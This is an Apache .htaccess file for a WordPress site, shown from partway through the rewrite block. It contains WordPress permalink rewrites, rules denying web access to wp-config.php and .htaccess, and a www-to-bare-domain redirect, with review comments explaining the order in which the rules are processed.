RewriteEngine On

RewriteBase /

# Stop as soon as the request already targets index.php (prevents a loop on the internal
# redirect). Side effect: any rule placed after this block never sees permalink requests.
RewriteRule ^index\.php$ - [L]

RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule . /index.php [L]

</IfModule>

# END WordPress

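# Deny all web access to wp-config.php (DB credentials, salts) and to .htaccess itself.
# Defence in depth only: PHP normally executes wp-config.php rather than serving its source,
# but this protects against a broken PHP handler or a renamed backup copy served as text.
# Apache 2.4 without mod_access_compat rejects "order"/"deny from" ("Invalid command", i.e.
# HTTP 500 for every request), so each version gets its own syntax.
<Files wp-config.php>

<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    order allow,deny
    deny from all
</IfModule>

</Files>

<Files .htaccess>

<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    order allow,deny
    deny from all
</IfModule>

</Files>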

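AddDefaultCharset utf-8

# Canonical host: 301 www.kamelot39.ru -> kamelot39.ru. Dots are escaped so the pattern matches
# only this host (an unescaped '.' matches any character).
# NOTE(review): placed here, after the front-controller rules, this redirect only fires for the
# site root and for URLs that map to existing files. Permalink requests have already been
# rewritten to index.php by the rules above, and "RewriteRule ^index\.php$ - [L]" in the
# WordPress block stops processing before this rule is reached. Move the host redirect above
# the first rewrite-to-index.php rule if www.* URLs are meant to be canonicalised.
RewriteEngine On

RewriteCond %{HTTP_HOST} ^www\.kamelot39\.ru$ [NC]

RewriteRule ^(.*)$ http://kamelot39.ru/$1 [R=301,L]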